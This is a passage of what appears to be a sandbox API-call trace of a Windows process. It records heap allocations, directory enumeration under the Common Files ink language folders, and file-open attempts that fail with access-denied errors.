hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0100.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.571] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c700, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⠀")) returned 0 [0100.571] FindClose (in: hFindFile=0x78190 | out: hFindFile=0x78190) returned 1 [0100.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0100.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0100.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0100.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0100.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0100.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0100.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0100.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0100.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0100.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0100.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0100.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.572] AreFileApisANSI () returned 1 [0100.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL", lpUsedDefaultChar=0x0) returned 57 [0100.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0100.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.573] AreFileApisANSI () returned 1 [0100.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a4b0 [0100.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL") returned 57 [0100.573] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.573] GetLastError () returned 0x5 [0100.573] GetLastError () returned 0x5 [0100.573] SetLastError (dwErrCode=0x5) [0100.573] GetLastError () returned 0x5 [0100.573] SetLastError (dwErrCode=0x5) [0100.573] GetLastError () returned 0x5 [0100.573] SetLastError (dwErrCode=0x5) [0100.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0100.573] AreFileApisANSI () returned 1 [0100.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0100.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL") returned 57 [0100.574] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.574] GetLastError () returned 0x5 [0100.574] GetLastError () returned 0x5 [0100.574] SetLastError (dwErrCode=0x5) [0100.574] GetLastError () returned 0x5 [0100.574] SetLastError (dwErrCode=0x5) [0100.574] GetLastError () returned 0x5 [0100.574] SetLastError (dwErrCode=0x5) [0100.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0100.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0100.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0100.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0100.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0100.574] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d988, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0100.575] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78450 [0100.575] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d57c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.575] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e8e6bbf, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e8e6bbf, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e8e6bbf, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0100.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46198 [0100.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0100.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0100.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0100.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0100.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0100.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0100.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0100.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0100.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cb90 [0100.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.576] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.576] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.576] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.576] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0100.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.576] AreFileApisANSI () returned 1 [0100.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0100.576] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.576] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0100.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0100.577] AreFileApisANSI () returned 1 [0100.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85c60 [0100.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui") returned 73 [0100.577] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.577] GetFileType (hFile=0x27c) returned 0x1 [0100.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0100.577] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.578] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.578] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.578] CloseHandle (hObject=0x27c) returned 1 [0100.578] AreFileApisANSI () returned 1 [0100.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85ee0 [0100.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui") returned 73 [0100.578] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.579] GetLastError () returned 0x5 [0100.579] GetLastError () returned 0x5 [0100.579] SetLastError (dwErrCode=0x5) [0100.579] GetLastError () returned 0x5 [0100.579] SetLastError (dwErrCode=0x5) [0100.579] GetLastError () returned 0x5 [0100.579] SetLastError (dwErrCode=0x5) [0100.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0100.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0100.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.579] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8cb98, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⠀")) returned 0 [0100.579] FindClose (in: hFindFile=0x78450 | out: hFindFile=0x78450) returned 1 [0100.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0100.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0100.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0100.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46198 | out: hHeap=0x20000) returned 1 [0100.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0100.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5ef58 [0100.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0100.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0100.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ef58 | out: hHeap=0x20000) returned 1 [0100.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0100.580] AreFileApisANSI () returned 1 [0100.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR", lpUsedDefaultChar=0x0) returned 57 [0100.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0100.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.580] AreFileApisANSI () returned 1 [0100.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0100.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR") returned 57 [0100.581] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br"), 